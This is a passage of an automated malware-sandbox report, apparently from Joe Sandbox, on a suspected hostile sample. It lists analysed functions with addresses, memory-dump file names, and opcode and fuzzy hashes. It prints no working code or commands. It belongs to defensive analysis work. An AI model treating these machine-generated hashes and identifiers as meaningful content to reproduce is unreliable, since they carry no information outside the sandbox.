                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea5a8db04561fca9c530a290f1888e3deb5c74b665f432d48081b98ef7800c2b
                                  • Instruction ID: 1f28d0ff48d25fc3e2b8e55559b10c4227b7e1df887e76d1f4f3f005955d6bf6
                                  • Opcode Fuzzy Hash: ea5a8db04561fca9c530a290f1888e3deb5c74b665f432d48081b98ef7800c2b
                                  • Instruction Fuzzy Hash: A8614A72D287918BD312CF28C880669BBA2BFC6314F29837DEE955B397E7749941C740
                                  Function 01114B60 Relevance: .2, Instructions: 166COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d787076e04f8c08e39ddd3992b6b1302f0c435befcfb111aeed6183b1345a802
                                  • Instruction ID: 60388207f7015b1b7aea871971f4edca31e7c70dd7ebcbafeb4f409132a3486a
                                  • Opcode Fuzzy Hash: d787076e04f8c08e39ddd3992b6b1302f0c435befcfb111aeed6183b1345a802
                                  • Instruction Fuzzy Hash: D741CF77B206280BE35C98699CA526A72C297D4310B4B463DDA96CB3C6ED74DD16A3C0
                                  Function 0130A000 Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                  • Instruction ID: a5cd00452d9444911b839d3df31e49bff8482831882925035e9ff67d58642d1a
                                  • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                  • Instruction Fuzzy Hash: F531B03170831D4BC716ED6DE4E422BF6D69BC8268F59C63CE689C37C1E9718C498681
                                  Function 0123AB2C Relevance: .0, Instructions: 47COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                  • Instruction ID: 4927fdd2120a526ad948b6d022536e6e13c606cad1656d6a9a2e7da1dccbda3f
                                  • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                  • Instruction Fuzzy Hash: 23F0AF73B7522A0BA360CDBA6C001E6A2C3A3D0270F1F8965DC84D7501E9348C4686C6
                                  Function 0123AAC0 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                  • Instruction ID: 18fc92529ec3e9fb466dbb338f5ea7c0bdc630e0e5b46dbb80743e310f7eb9c7
                                  • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                  • Instruction Fuzzy Hash: D7F08C33A30A340B6360CC7A8D05097A2C797C86B0B0FC979ECA0E7206E930EC0656D1
                                  Function 01169980 Relevance: .0, Instructions: 7COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6ee6b1f04e7afdc52ee5d5d17e749e794d41c8486ed8ffe5405b5a2596f2d857
                                  • Instruction ID: 7c45dcc3ee2bd4edb1ed25f84bf76aaead55971dd6d003b2dc38ecb69bcff95e
                                  • Opcode Fuzzy Hash: 6ee6b1f04e7afdc52ee5d5d17e749e794d41c8486ed8ffe5405b5a2596f2d857
                                  • Instruction Fuzzy Hash: 45B012319003014F572BC938DC710A532B2738220579DD4E4D00345006E736D023C700
                                  Function 00FE6810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: [
                                  • API String ID: 0-784033777
                                  • Opcode ID: cd627919f435bf423846cb76e1611de1a9cdfd63f61bef37f96ba3bdd8f1d172
                                  • Instruction ID: 0a0fe0c1c25e0993ea98c5f8895011236eb70b19a73e914ccf4a9ba8cca13aa1
                                  • Opcode Fuzzy Hash: cd627919f435bf423846cb76e1611de1a9cdfd63f61bef37f96ba3bdd8f1d172
                                  • Instruction Fuzzy Hash: 68B16B72D083CD5BDB358A27889477F7BD8EBB53A8F28052EE4C5C6182E725D844B352